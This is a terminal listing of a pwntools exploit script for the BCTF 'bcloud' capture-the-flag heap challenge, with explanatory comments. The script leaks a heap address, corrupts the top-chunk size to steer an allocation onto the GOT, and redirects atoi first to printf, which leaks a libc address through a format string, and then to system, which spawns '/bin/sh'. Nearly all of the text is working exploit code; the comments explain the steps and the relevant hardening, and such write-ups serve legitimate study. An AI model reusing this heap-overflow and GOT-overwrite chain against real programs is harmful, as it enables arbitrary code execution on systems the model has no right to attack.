w00t@ubuntu32svr:~/bctf/bcloud$ cat a.py
#!/usr/bin/env python
# NOTE(review): Python 2 script (bare `print` statements); `pwn` (pwntools) is a
# third-party dependency.  The original listing was collapsed onto a few lines;
# only whitespace and comments were restored here.
from pwn import *

# Fixed addresses/offsets taken from the challenge binary and the libc build it
# shipped with.  They are specific to that build: the binary is non-PIE (absolute
# PLT/GOT addresses) and the libc offsets only hold for the matching libc.
addr_plt_printf = 0x080484d0
addr_got_atoi = 0x0804b03c
offset_libc_IO_stderr = 0x001aa960
offset_libc_system = 0x00040190


def New(cmn, size, data):
    """Drive menu option 1 of the target: answer the size prompt with `size`
    and, only when `size` > 0, the content prompt with `data`.

    cmn:  pwntools tube connected to the target.
    size: int, sent as decimal text.
    data: content sent when size > 0; ignored otherwise (callers pass None).
    """
    cmn.recvuntil('>>\n')
    cmn.sendline('1')
    cmn.recvuntil('content:\n')
    cmn.sendline(str(size))
    cmn.recvuntil('content:\n')
    # A non-positive size sends no content; the caller below uses this to
    # make an allocation without writing into it.
    if size>0:
        cmn.sendline(data)


def Edit(cmn, id_num, data):
    """Drive menu option 3 of the target: select entry `id_num`, then send
    `data` as its new content.

    The menu choice is sent as '3 ' (trailing space) as-is; presumably the
    target's numeric parsing tolerates it -- confirm against the binary.
    """
    cmn.recvuntil('>>\n')
    cmn.sendline('3 ')
    cmn.recvuntil('id:\n')
    cmn.sendline(str(id_num))
    cmn.recvuntil('content:\n')
    cmn.sendline(data)


# --- Stage 0: information leak ---------------------------------------------
# A 0x40-byte name with no terminator is sent; the bytes the program echoes back
# immediately before '! ' are read as a little-endian 32-bit value and treated as
# a heap pointer.  Root cause (inferred, not visible here): the name buffer is
# printed without a NUL terminator, so adjacent memory is disclosed.
# Defender note: this leak is what defeats heap/libc ASLR for the later stages.
s = process('./bcloud.9a3bd1d30276b501a51ac8931b3e43c4')
s.recvuntil('name:\n')
s.send('a'*0x40)
buf = s.recv(0x44)
print hexdump(buf)
buf = s.recvuntil('! ')
print hexdump(buf)
addr_heap = buf[:-2]
addr_heap = u32(addr_heap)-8  # -8: writeup-specific adjustment of the leaked pointer
print('addr_heap : 0x%08x' % addr_heap)

buf=s.recvuntil('Org:\n')
print hexdump(buf)
s.send('a'*0x40)
buf=s.recvuntil('Host:\n')
print hexdump(buf)
# 0xffffffff is written through the Host field.  Presumably this overwrites a
# heap metadata field adjacent to the input buffer (an unchecked write) -- TODO
# confirm against the binary.  Newer glibc releases add an integrity check on
# implausible top-chunk sizes, which is the relevant hardening for this class.
s.sendline(p32(0xffffffff))
# Allocation whose size is derived from the GOT address and the leaked heap
# address; no content is sent.  The 0xe0 and 0x8 constants are writeup-specific.
New(s, addr_got_atoi-0x4-(addr_heap+0xe0)-0x8, None)

# --- Stage 1: libc leak ------------------------------------------------------
# Content written: p32(0xdeadbeef) || p32(printf@plt).  Given the address
# arithmetic above, this presumably replaces the atoi GOT entry with printf@plt,
# after which the menu input is interpreted by printf; '%24$p' then prints a
# stack value that the script treats as a pointer into libc's _IO_stderr.
# Defender note: Full RELRO (read-only GOT) removes this write target entirely.
exploit_st1 = p32(0xdeadbeef)
exploit_st1 += p32(addr_plt_printf)
New(s, 0x100, exploit_st1)
s.recvuntil('>>\n')
s.sendline('%24$p')
# recv(10) assumes exactly '0x' + 8 hex digits arrive in one read; a short read
# or a differently formatted value raises ValueError here.
addr_libc_IO_stderr = int(s.recv(10),16)
addr_libc_base = addr_libc_IO_stderr - offset_libc_IO_stderr
addr_libc_system = addr_libc_base + offset_libc_system
print('addr_libc_base : 0x%08x' % addr_libc_base)

# --- Stage 2: second overwrite, then trigger ---------------------------------
# Entry 0 (the one written in stage 1) is rewritten with p32(0xdeadbeef) ||
# p32(system), so the same GOT slot now presumably points at system; the next
# menu choice string is then passed to it.
exploit_st2 = p32(0xdeadbeef)
exploit_st2 += p32(addr_libc_system)
Edit(s, 0, exploit_st2)
s.recvuntil('>>\n')
s.sendline('/bin/sh')
s.interactive()
### 참조
http://shift-crops.hatenablog.com/entry/2016/03/21/171249
http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt (double free 원재아빠)